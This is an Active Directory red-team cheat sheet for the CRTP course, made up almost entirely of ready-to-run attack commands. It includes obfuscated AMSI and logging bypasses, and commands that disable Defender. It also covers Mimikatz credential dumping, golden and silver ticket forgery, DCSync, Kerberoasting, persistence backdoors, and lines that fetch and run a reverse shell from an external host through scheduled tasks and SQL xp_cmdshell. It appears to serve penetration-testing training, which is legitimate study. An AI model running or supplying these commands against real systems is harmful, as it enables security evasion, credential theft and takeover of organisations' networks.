CRTP CheatSheet

Bypass

AMSI BYPASS

Set-Item ('Va'+'rI'+'a'+'blE:1'+'q2'+'uZx') ([TYpE]("F"+'rE')) 
(Get-variable (('1Q'+'2U') +'zX'))."A`ss`Embly"."GET`TY`Pe"(('Uti'+'l','A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em'))).g`etf`iElD"(('a'+'msi'),'d',('I'+'nitF'+'aile'))).(sE`T`VaLUE)(${n`ULl},${t`RuE})

Script Block logging bypass:

[Reflection.Assembly]::"l`o`AdwIThPa`Rti`AlnamE"(('S'+'ystem'+'.C'+'ore'))."g`E`TTYPE"(('Sys'+'tem.Di'+'agno'+'stics.Event'+'i'+'ng.EventProv'+'i'+'der'))."gET`FI`eLd"(('m'+'_'+'enabled'),('NonP'+'ubl'+'ic'+',Instance'))."seTVa`l`Ue"([Ref]."a`sSem`BlY"."gE`T`TyPE"(('Sys'+'tem'+'.Mana'+'ge'+'ment.Aut'+'o'+'mation.Tracing.'+'PSEtwLo'+'g'+'Pro'+'vi'+'der'))."gEtFIe`Ld"(('e'+'twProvid'+'er'),('N'+'o'+'nPu'+'b'+'lic,Static'))."gE`Tva`lUe"($null),0)

.NET AMSI bypass:

$ZQCUW = @"
using System;
using System.Runtime.InteropServices;
public class ZQCUW {
[DllImport("kernel32")]
public static extern IntPtr GetProcAddress(IntPtr hModule, string
procName);
[DllImport("kernel32")]
public static extern IntPtr LoadLibrary(string name);
[DllImport("kernel32")]
public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr
dwSize, uint flNewProtect, out uint lpflOldProtect);
}
"@
Add-Type $ZQCUW
$BBWHVWQ =
[ZQCUW]::LoadLibrary("$([SYstem.Net.wEBUtIlITy]::HTmldecoDE('amsi.dll'))")
$XPYMWR = [ZQCUW]::GetProcAddress($BBWHVWQ,
"$([systeM.neT.webUtility]::HtMldECoDE('AmsiScanBuffer'))")
$p = 0
[ZQCUW]::VirtualProtect($XPYMWR, [uint32]5, 0x40, [ref]$p)
$TLML = "0xB8"
$PURX = "0x57"
$YNWL = "0x00"
$RTGX = "0x07"
$XVON = "0x80"
$WRUD = "0xC3"
$KTMJX = [Byte[]] ($TLML,$PURX,$YNWL,$RTGX,+$XVON,+$WRUD)
[System.Runtime.InteropServices.Marshal]::Copy($KTMJX, 0, $XPYMWR, 6)

AD Module Enumération

Get-ADUser -Filter * | Select -ExpandProperty samaccountname
Get-ADComputer –Filter * | select –expand name
Get-ADGroup -Identity 'Domain Admins' -Properties *
Get-ADGroup -Identity machineadmins -Properties Description
Get-ADGroupMember -Identity 'Domain Admins'
Get-ADGroupMember -Identity 'Enterprise Admins'
Get-ADGroupMember -Identity 'Enterprise Admins' -Server domain.local
Get-ADOrganizationalUnit -Identity 'OU=StudentsMachines,DC=us,DC=domain,DC=local' | %{Get-ADComputer -SearchBase $_ -Filter *} | select name
Get-ACL 'AD:\CN=Domain Admins,CN=Users,DC=us,DC=domain,DC=local' | select -ExpandProperty Access
(Get-ADForest).Domains
Get-ADTrust -Filter *
Get-ADTrust -Filter 'intraForest -ne $True' -Server (Get-ADForest).Name
(Get-ADForest).Domains | %{Get-ADTrust -Filter '(intraForest -ne $True) -and (ForestTransitive -ne $True)' -Server $_}
Get-ADTrust -Filter * -Server domain.local

Powerview Domain Enumeration

##PowerView.ps1

#Load PowerView
. ./PowerView.ps1

#Get Domain Information, Retrieves information about the current domain.
Get-NetDomain

#Get information of another domain
Get-NetDomain -Domain <domainname>

#Get domain SID for current domain
Get-DomainSID

#Enumerate Domain Controllers
Get-NetDomainController

#Lists all Domain Controllers in the current domain, List Domain Users
Get-NetUser

#Get domain password policy 
Get-DomainPolicy
(Get-DomainPolicy)."System Access"
net accounts

#Lists information of an user
Get-NetUser -Username <username>

#Displays all users in the domain, along with detailed attributes, Find High-Value Targets
Get-NetUser -AdminCount 1

#Lists all users flagged as administrators, Enumerate Domain Groups
Get-NetGroup

#Retrieves all domain groups. Lists members of the "Domain Admins" group.
Get-NetGroupMember -GroupName "Domain Admins"

#Locate Domain Computers. Lists all computers in the domain.
Get-NetComputer

#Analyze Trust Relationships. Displays trust relationships between domains.
Get-NetDomainTrust



#Find Shares on Domain Computers. Locates shared folders across domain computers.
Invoke-ShareFinder
Invoke-ShareFinder -ExcludeStandard -ExcludePrint -ExcludeIPC

Import-Module C:\AD\Tools\PowerHuntShares.psm1
Invoke-HuntSMBShares -NoPing -OutputDirectory C:\AD\Tools -HostList C:\AD\Tools\servers.txt

#Find interseting files on Computers

Invoke-FileFinder -Verbose

#Identify Delegation Configurations. Finds user accounts with Service Principal Names (SPNs), often used in Kerberos-based attacks.
Get-NetUser -SPN


#GPO Enumeration
#Get list of GPO in current domain
Get-DomainGPO
Get-DomainGPO | select displayname
Get-DomainGPO -ComputerIdentity dcorp-student1

#Get GPOs which use Restricted Groups or groups.xml for interesting users
Get-DomainGPOLocalGroup

#Get users which are in a local group of a machine using GPO
Get-DomainGPOComputerLocalGroupMapping -ComputerIdentity dcorp-student1

#Get machines where the given user is member of a specific group
Get-DomainGPOUserLocalGroupMapping -Identity student1 -Verbose

#Get OUs in a domain
Get-DomainOU
Get-ADOrganizationalUnit -Filter * -Properties *

#List all the computers in the DevOps OU
(Get-DomainOU -Identity DevOps).distinguishedname | %{Get-DomainComputer -SearchBase $_} | select name

#Get GPO applied on an OU, read GPOname from gplink attribute from Get-NetOU
Get-DomainGPO -Identity "{0D1CC23D-1F20-4EEE...........}"
#Enumerate GPO applied on the DevOps OU
#To enumerate GPO applied on the DevOps OU, we need the name of the policy from the gplink attribute from the OU:
(Get-DomainOU -Identity DevOps).gplink
[LDAP://cn={0BF8D01C-1F62-4BDC-958C-57140B67D147},cn=policies,cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]
#Copy the value between {} including the brackets as well:  {0BF8D01C-1F62-4BDC-958C-57140B67D147}
Get-DomainGPO -Identity '{0BF8D01C-1F62-4BDC-958C-57140B67D147}'
#Or Enumerate GPO for DevOps OU in a unique command
Get-DomainGPO -Identity (Get-DomainOU -Identity DevOps).gplink.substring(11,(Get-DomainOU -Identity DevOps).gplink.length-72)

###Domain Trust Enumeration
##To enumerate domain trusts:
#List all domain trusts for the current domain
Get-DomainTrust
#List trusts for a specific domain
Get-DomainTrust -Domain us.dollarcorp.moneycorp.local
#Using Active Directory module
Get-ADTrust
Get-ADTrust -Identity us.dollarcorp.moneycorp.local
#List external trusts in the current forest
Get-DomainTrust | ?{$_.TrustAttributes -eq "FILTER_SIDS"}

  
#List sessions on remote machines Users

. C:\AD\Tools\Invoke-SessionHunter.ps1
Invoke-SessionHunter -FailSafe
Invoke-SessionHunter -NoPortScan -RawResults | select Hostname,UserSession,Access

Powerview GPO

# Get list of GPO's in the current domain
Get-NetGPO
Get-NetGPO -Computername <computername>

# Get GPO's which uses restricteds groups or groups.xml for interesting users

Get-NetGPOGroup

# Get users which are in a local group of a machine using GPO
Find-GPOComputerAdmin -Computername <computername>

# Get machines where the given user is member of a specific group
Find-GPOLocation -Username student244 -Verbose

# Get OU's in a domain
Get-NetOU -Fulldata

# Get machines that are part of an OU
Get-NetOU StudentMachines | %{Get-NetComputer -ADSPath $_}

# Get GPO applied on an OU
gplink from Get-NetOU -Fulldata
Get-NetGPO -GPOname "{<gplink>}"

#GPP attack 
findstr /S /I cpassword \\dc.organicsecurity.local\sysvol\organicsecurity.local\policies\*.xml
Get-DecryptedCpassword

Powerview ACL

# Get the ACL's associated with the specified object
Get-ObjectACL -SamAccountName <accountname> -ResolveGUIDS

# Get the ACL's associated with the specified prefix to be used for search
Get-ObjectACL -ADSprefix ‘CN=Administrator,CN=Users’ -Verbose

# Get the ACL's associated with the specified path
Get-PathAcl -Path \\<Domain controller>\sysvol

# Search for interesting ACL's

Invoke-ACLScanner -ResolveGUIDs
Invoke-ACLScanner -ResolveGUIDs | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl

# Search of interesting ACL's for the current user

Invoke-ACLScanner | Where-Object {$_.IdentityReference –eq [System.Security.Principal.WindowsIdentity]::GetCurrent().Name}

#Check if the user has dcsync right
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ? {($_.IdentityReference -match "<username>") -and (($_.ObjectType -match 'replication') -or ($_.ActiveDirectoryRights -match 'GenericAll'))}

# Check if user got generic all against domain admins group

Get-ObjectAcl -SamaccountName “Domain Admins” –ResolveGUIDS | ?{$_.identityReference -match ‘<username>’}

# Add fullcontrol permissions for a user to the adminSDHolder
Add-ObjectAcl -TargetADSprefix ‘CN=AdminSDHolder,CN=System’ PrincipalSamAccountName <username> -Rights All -Verbose

# Run SDProp on AD (Force the sync of AdminSDHolder)
Invoke-SDPropagator -showProgress -timeoutMinutes 1

#Before server 2008
Invoke-SDpropagator -taskname FixUpInheritance -timeoutMinutes 1 -showProgress -Verbose

# Add user to domain admin group
Add-DomainGroupMember -Identity ‘Domain Admins’ -Members <username> -Verbose
Net group "domain admins" sportless /add /domain

# Abuse resetpassword using powerview_dev
Set-DomainUserPassword -Identity <username> -AccountPassword (ConvertTo-SecureString "Password@123" -AsPlainText -Force ) -Verbose

Powerview Domain trust

# Get a list of all the domain trusts for the current domain
Get-NetDomainTrust
#To map information about the forest:
#Get details about the current forest
Get-Forest
Get-Forest -Forest eurocorp.local
#Using Active Directory module
Get-ADForest
Get-ADForest -Identity eurocorp.local
#Retrieve all domains in the current forest:
Get-ForestDomain
Get-ForestDomain -Forest eurocorp.local
(Get-ADForest).Domains
#Retrieve all global catalogs for the forest:
Get-ForestGlobalCatalog
Get-ForestGlobalCatalog -Forest eurocorp.local
Get-ADForest | Select-Object -ExpandProperty GlobalCatalogs
#Map forest trust relationships (if any exist):
Get-ForestTrust
Get-ForestTrust -Forest eurocorp.local
#Alternative using Active Directory module
Get-ADTrust -Filter 'msDS-TrustForestTrustInfo -ne "$null"'

BloodHound

. ./sharphound.ps1
Invoke-Bloodhound -CollectionMethod all -Verbose
Invoke-Bloodhound -CollectionMethod LoggedOn -Verbose
Invoke-BloodHound –Stealth
SharpHound.exe –-Stealth
Invoke-BloodHound -ExcludeDCs


#Copy neo4j-community-3.5.1 to C:\
#Open cmd
cd C:\neo4j\neo4j-community-3.5.1-windows\bin
neo4j.bat install-service
neo4j.bat start
#Browse to BloodHound-win32-x64
Run BloodHound.exe
#Change credentials and login

Local privilege escalation

Privesc check all

https://github.com/enjoiz/Privesc

C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

. .\privesc.ps1
Invoke-PrivEsc

Beroot check all

https://github.com/AlessandroZ/BeRoot

./beRoot.exe

Run powerup check all

https://github.com/HarmJ0y/PowerUp

. ./powerup
Invoke-allchecks

Run powerup get services with unqouted paths and a space in their name

Get-ServiceUnquoted -Verbose
Get-ModifiableServiceFile -Verbose

Abuse service to get local admin permissions with powerup

Invoke-ServiceAbuse
Invoke-ServiceAbuse -Name 'AbyssWebServer' -UserName '<domain>\<username>'

Add user to local admin and RDP group and enable RDP on firewall

net user <username> <password> /add /Y   && net localgroup administrators <username> /add   && net localgroup "Remote Desktop Users" <username> /add && reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f && netsh advfirewall firewall set rule group="remote desktop" new enable=Yes

Check the language mode

$ExecutionContext.SessionState.LanguageMode

Enumerate applocker policy

Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections

Lateral Movement

Open a cmd as another user

runas /netonly /user:domain\user cmd.exe

Powerview Find all machines on the current domain where the current user has local admin access

Find-LocalAdminAccess -Verbose

. ./Find-WMILocalAdminAccess.ps1
Find-WMILocalAdminAccess

. ./Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess

Invoke-EnumerateLocalAdmin -Verbose

Connect to machine with administrator privs

Enter-PSSession -Computername <computername>

Connect to a machine with winrs

#More oppsec that Enter-PSSession
winrs -d:server1 -u:server1\administrator -p:Pass hostname -r:command

Save and use sessions of a machine

$sess = New-PSSession -Computername <computername>
Enter-PSSession $sess

Find active sessions

Invoke-UserHunter
Invoke-UserHunter -Groupname "RDPUsers"

Find active sessions of domain admins

Invoke-UserHunter -Groupname "Domain Admins"

check access to machine

Invoke-UserHunter -CheckAccess

Execute commands on a machine

Invoke-Command -Computername <computername> -Scriptblock {whoami} 
Invoke-Command -Scriptblock {whoami} $sess

Load script on a machine

Invoke-Command -Computername <computername> -FilePath <path>
Invoke-Command -FilePath <path> $sess

Download and load script on a machine

iex (iwr http://xx.xx.xx.xx/<scriptname> -UseBasicParsing)

AMSI Bypass

• First one gets detected, added a new one!

sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )

$v=[Ref].Assembly.GetType('System.Management.Automation.Am' + 'siUtils'); $v."Get`Fie`ld"('ams' + 'iInitFailed','NonPublic,Static')."Set`Val`ue"($null,$true)

S`eT-It`em ( 'V'+'aR' +  'IA' + (("{1}{0}"-f'1','blE:')+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),(("{0}{1}" -f '.M','an')+'age'+'men'+'t.'),('u'+'to'+("{0}{2}{1}" -f 'ma','.','tion')),'s',(("{1}{0}"-f 't','Sys')+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+("{0}{1}" -f 'ni','tF')+("{1}{0}"-f 'ile','a'))  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+("{1}{0}" -f'ubl','P')+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )

Invoke-Command -Scriptblock {sET-ItEM ( 'V'+'aR' + 'IA' + 'blE:1q2' + 'uZx' ) ( [TYpE]( "{1}{0}"-F'F','rE' ) ) ; ( GeT-VariaBle ( "1Q2U" +"zX" ) -VaL )."A`ss`Embly"."GET`TY`Pe"(( "{6}{3}{1}{4}{2}{0}{5}" -f'Util','A','Amsi','.Management.','utomation.','s','System' ) )."g`etf`iElD"( ( "{0}{2}{1}" -f'amsi','d','InitFaile' ),( "{2}{4}{0}{1}{3}" -f 'Stat','i','NonPubli','c','c,' ))."sE`T`VaLUE"( ${n`ULl},${t`RuE} )} $sess

Disable AV monitoring

Get-MPPreference
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true

Execute locally loaded function on a list of remote machines

Invoke-Command -Scriptblock ${function:<function>} -Computername (Get-Content <list_of_servers>)
Invoke-Command -ScriptBlock ${function:Invoke-Mimikatz} -Computername (Get-Content <list_of_servers>)

Copy script to other server

Copy-Item .\Invoke-MimikatzEx.ps1 \\<servername>\c$\'Program Files'

Dump secrets

#Extracting Credentials from LSASS
#Mimikatz
#To dump credentials from LSASS on a local machine using Invoke-Mimikatz
Invoke-Mimikatz -Command "sekurlsa::ekeys"

# Mimikatz dump credentials on local machine
Invoke-Mimikatz -Dumpcreds

# Mimikatz dump credentials on multiple remote machines
Invoke-Mimikatz -Dumpcreds -Computername @(“<system1>”,”<system2>”)
Invoke-Mimikatz -Dumpcreds -ComputerName @("<computername 1>","<computername 2>")

# Mimikatz start powershell pass the hash (run as local admin)
Invoke-Mimikatz -Command '"sekurlsa::pth /user:<username> /domain:<domain> /ntlm:<ntlm hash> /run:powershell.exe"'

# Mimikatz dump from SAM
Invoke-Mimikatz -Command '"privilege::debug" "token::elevate" "lsadump::sam"'

# Mimikatz dump lsa (krbtgt to)
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

#SafetyKatz
#SafetyKatz is a minidump-based approach combined with PELoader to execute Mimikatz
SafetyKatz.exe "sekurlsa::ekeys"

#SharpKatz
#SharpKatz is a C# implementation of certain Mimikatz functionalities:
SharpKatz.exe --Command ekeys

#Dumpert (Direct System Calls & API Unhooking)
#Dumpert evades traditional monitoring by leveraging direct system calls:
rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

#Pypykatz (Python-based Mimikatz Alternative). For extracting credentials using Python
pypykatz.exe live lsa

#Comsvcs.dll for LSASS Dump. A built-in Windows DLL can be leveraged to dump LSASS memory:
tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\Users\Public\lsass.dmp full

Golden ticket

Dump hashes - Get the krbtgt hash

Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

Make golden ticket

Use /ticket instead of /ptt to save the ticket to file instead of loading in current powershell process To get the SID use Get-DomainSID from powerview

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /krbtgt:<hash> id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'

Use the DCSync feature for getting krbtgt hash. Execute with DA privileges

Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

Silver ticket

Make silver ticket for CIFS

Use the hash of the local computer

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:CIFS /rc4:<local computer hash> /user:Administrator /ptt"'

Check access (After CIFS silver ticket)

ls \\<servername>\c$\

Make silver ticket for Host

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:HOST /rc4:<local computer hash> /user:Administrator /ptt"'

Schedule and execute a task (After host silver ticket)

schtasks /create /S <target> /SC Weekly /RU "NT Authority\SYSTEM" /TN "Reverse" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1''')'"

schtasks /Run /S <target> /TN “Reverse”

Make silver ticket for WMI

Execute for WMI /service:HOST /service:RPCSS

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:HOST /rc4:<local computer hash> /user:Administrator /ptt"'

Invoke-Mimikatz -Command '"kerberos::golden /User:Administrator /domain:<domain> /sid:<domain sid> /target:<target> /service:RPCSS /rc4:<local computer hash> /user:Administrator /ptt"'

Check WMI Permission

Get-wmiobject -Class win32_operatingsystem -ComputerName <target>

Custom SSP - Track logons

Mimilib.dll

Drop mimilib.dll to system32 and add mimilib to HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' | select -ExpandProperty 'Security Packages'
$packages += "mimilib"
SetItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' Value $packages

Use mimikatz to inject into lsass

all logons are logged to C:\Windows\System32\kiwissp.log

Invoke-Mimikatz -Command ‘”misc:memssp”’

DCsync

# Add full-control rights

Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,DC=local’ -PrincipalSamAccountName <username> -Rights All -Verbose

# Add rights for DCsync

Add-ObjectAcl -TargetDistinguishedName ‘DC=dollarcorp,DC=moneycorp,Dc=local’ -PrincipalSamAccountName <username> -Rights DCSync -Verbose

# Execute DCSync and dump krbtgt
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\krbtgt"'

SecurityDescriptor - WMI

. ./Set-RemoteWMI.ps1

# On a local machine
Set-RemoteWMI -Username <username> -Verbose


# On a remote machine without explicit credentials

Set-RemoteWMI -Username <username> -Computername <computername> -namespace ‘root\cimv2’ -Verbose


# On a remote machine with explicit credentials

Only root/cimv and nested namespaces

Set-RemoteWMI -Username <username> -Computername <computername> -Credential Administrator -namespace ‘root\cimv2’ -Verbose


# On remote machine remove permissions

Set-RemoteWMI -Username <username> -Computername <computername> -namespace ‘root\cimv2’ -Remove -Verbose


#### Check WMI permissions
Get-wmiobject -Class win32_operatingsystem -ComputerName <computername>

SecurityDescriptor - Powershell Remoting

. ./Set-RemotePSRemoting.ps1

# On a local machine
Set-RemotePSRemoting -Username <username> -Verbose

# On a remote machine without credentials
Set-RemotePSRemoting -Username <username> -Computername <computername> -Verbose

# On a remote machine remove permissions
Set-RemotePSRemoting -Username <username> -Computername <computername> -Remove

SecurityDescriptor - Remote Registry

Using the DAMP toolkit


. ./Add-RemoteRegBackdoor
. ./RemoteHashRetrieval

# Using DAMP with admin privs on remote machine

Add-RemoteRegBackdoor -Computername <computername> -Trustee <username> -Verbose


# Retrieve machine account hash from local machine

Get-RemoteMachineAccountHash -Computername <computername> -Verbose


# Retrieve local account hash from local machine
Get-RemoteLocalAccountHash -Computername <computername> -Verbose


# Retrieve domain cached credentials from local machine
Get-RemoteCachedCredential -Computername <computername> -Verbose

Domain Privilege escalation

Kerberoast

# Find user accounts used as service accounts

. ./GetUserSPNs.ps1
Get-NetUser -SPN
Get-NetUser -SPN | select samaccountname,serviceprincipalname


#### Reguest a TGS
Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"

or

Request-SPNTicket "MSSQLSvc/dcorp-mgmt.dollarcorp.moneycorp.local"


# Export ticket using Mimikatz
Invoke-Mimikatz -Command '"Kerberos::list /export"'


# Crack the ticket

python.exe .\tgsrepcrack.py .\10k-worst-pass.txt .\2-40a10000-student1@MSSQLSvc~dcorp-mgmt.dollarcorp.moneycorp.local-DOLLARCORP.MONEYCORP.LOCAL.kirbi

.\hashcat.exe -m 18200 -a 0 <HASH FILE> <WORDLIST>

AS-REPS Roasting

#### Enumerating accounts with kerberos preauth disabled
. .\Powerview_dev.ps1
Get-DomainUser -PreauthNotRequired -Verbose
Get-DomainUser -PreauthNotRequired -verbose | select samaccountname

#### Set preauth not required
. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose

#### Request encrypted AS-REP
. ./ASREPRoast.ps1
Get-ASREPHash -Username <username> -Verbose


#### Enumerate all users with kerberos preauth disabled and request a hash
Invoke-ASREPRoast -Verbose
Invoke-ASREPRoast -Verbose | fl

#### Crack the hash with hashcat
Hashcat -a 0 -m 18200 hash.txt rockyou.txt

Set SPN

# Enumerate permissions for group on ACL

Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”}
Invoke-ACLScanner -ResolveGUIDS | Where-Object {$_.IdentityReference -match “<groupname>”} | select IdentityReference, ObjectDN, ActiveDirectoryRights | fl


# Check if user has SPN

. ./Powerview_dev.ps1
Get-DomainUser -Identity <username> | select samaccountname, serviceprincipalname
or 
Get-NetUser | Where-Object {$_.servicePrincipalName}

# Set SPN for the user

. ./PowerView_dev.ps1
Set-DomainObject -Identity <username> -Set @{serviceprincipalname=’ops/whatever1’}

# Request a TGS
Add-Type -AssemblyName System.IdentityModel 
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "ops/whatever1"


# Export ticket to disk for offline cracking
Invoke-Mimikatz -Command '"Kerberos::list /export"'


# Request TGS hash for offline cracking hashcat
Get-DomainUser -Identity <username> | Get-DomainSPNTicket | select -ExpandProperty Hash

# Crack the hash with hashcat
Hashcat -a 0 -m 18200 hash.txt rockyou.txt

Unconstrained Delegation

# Discover domain computers which have unconstrained delegation

Domain Controllers always show up, ignore them
 . .\PowerView_dev.ps1
Get-Netcomputer -UnConstrained
Get-Netcomputer -UnConstrained | select samaccountname


#### Check if any DA tokens are available on the unconstrained machine
Wait for a domain admin to login while checking for tokens
Invoke-Mimikatz -Command '"sekurlsa::tickets"'


#### Export the TGT ticket
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

#### Reuse the TGT ticket
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'

Constrained Delegation

Enumerate

# Enumerate users with contrained delegation enabled

Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

# Enumerate computers with contrained delegation enabled
Get-Domaincomputer -TrustedToAuth
Get-Domaincomputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto


# Constrained delegation User
# Requesting TGT with kekeo

./kekeo.exe
Tgt::ask /user:<username> /domain:<domain> /rc4:<hash>

# Requesting TGS with kekeo

Tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local


# Use Mimikatz to inject the TGS ticket
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'


### Constrained delegation Computer
#### Requesting TGT with a PC hash

./kekeo.exe
Tgt::ask /user:dcorp-adminsrv$ /domain:<domain> /rc4:<hash>


#### Requesting TGS

No validation for the SPN specified
Tgs::s4u /tgt:<kirbi file> /user:Administrator@<domain> /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL


#### Using mimikatz to inject TGS ticket and executing DCsync

Invoke-Mimikatz -Command '"Kerberos::ptt <kirbi file>"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<shortdomain>\krbtgt"'

DNS Admins

# Enumerate member of the DNS admin group



Get-NetGRoupMember “DNSAdmins”


# From the privilege of DNSAdmins group member, configue DDL using dnscmd.exe (needs RSAT DNS)


Share the directory the ddl is in for everyone so its accessible. logs all DNS queries on C:\Windows\System32\kiwidns.log


Dnscmd <dns server> /config /serverlevelplugindll \\<ip>\dll\mimilib.dll

# Restart DNS

Sc \\<dns server> stop dns
Sc \\<dns server> start dns

Enterprise Admins

### Child to parent - trust tickets
# Dump trust keys
Look for in trust key from child to parent (first command) - This worked best for me! Second command didnt work :( Look for NTLM hash (second command)


Invoke-Mimikatz -Command '"lsadump::trust /patch"' -Computername <computername>
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<domain>\<computername>$"'

# Create an inter-realm TGT

Invoke-Mimikatz -Command '"Kerberos::golden /user:Administrator /domain:<domain> /sid:<sid of current domain> /sids:<sid of enterprise admin groups of the parent domain> /rc4:<trust hash> /service:krbtgt /target:<target domain> /ticket:<path to save ticket>"'


# Create a TGS for a service (kekeo_old)
./asktgs.exe <kirbi file> CIFS/<forest dc name>


# Use TGS to access the targeted service (may need to run it twice) (kekeo_old)
./kirbikator.exe lsa .\<kirbi file>


# Check access to server
ls \\<servername>\c$ 


### Child to parent - krbtgt hash
# Get krbtgt hash from dc
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -Computername <computername>

# Create TGT

the mimikatz option /sids is forcefully setting the SID history for the Enterprise Admin group for dollarcorp.moneycorp.local that is the Forest Enterprise Admin Group

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<domain> /sid:<sid> /sids:<sids> /krbtgt:<hash> /ticket:<path to save ticket>"'

# Inject the ticket
Invoke-Mimikatz -Command '"kerberos::ptt <path to ticket>"'

# Get SID of enterprise admin
Get-NetGroup -Domain <domain> -GroupName "Enterprise Admins" -FullData | select samaccountname, objectsid

Crossforest attacks

### Trust flow
#### Dump trust keys

Look for in trust key from child to parent (first command) Look for NTLM hash (second command)

Invoke-Mimikatz -Command '"lsadump::trust /patch"' -Computername <computername>
Invoke-Mimikatz -Command '"lsadump::dcsync /user:dcorp\mcorp$"'


# Create a intern-forest TGT

Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<domain> /sid:<domain sid> /rc4:<hash of trust> /service:krbtgt /target:<target> /ticket:<path to save ticket>"'

# Create a TGS for a service (kekeo_old)
./asktgs.exe <kirbi file> CIFS/<crossforest dc name>


# Use the TGT
./kirbikator.exe lsa <kirbi file>

# Check access to server
ls \\<servername>\<share>\

Abuse SQL

. .\PowerUpSQL.ps1

#### Discovery SPN scanning
Get-SQLInstanceDomain

#### Check accessibility
Get-SQLConnectionTestThreaded
Get-SQLInstanceDomain | Get-SQLConnectionTestThreaded – Verbose

#Gather information

Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose
# Search for links to remote servers
Get-SQLServerLink -Instance <sql instance> -Verbose


# Enumerate database links
Get-SQLServerLinkCrawl -Instance <sql instance> -Verbose

# Enable xp_cmdshell
Execute(‘sp_configure “xp_cmdshell”,1;reconfigure;’) AT “<sql instance>”


# Execute commands
Get-SQLServerLinkCrawl -Instance <sql instance> -Query "exec master..xp_cmdshell 'whoami'"

# Execute reverse shell example

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'Powershell.exe iex (iwr http://xx.xx.xx.xx/Invoke-PowerShellTcp.ps1 -UseBasicParsing);reverse -Reverse -IPAddress xx.xx.xx.xx -Port 4000'"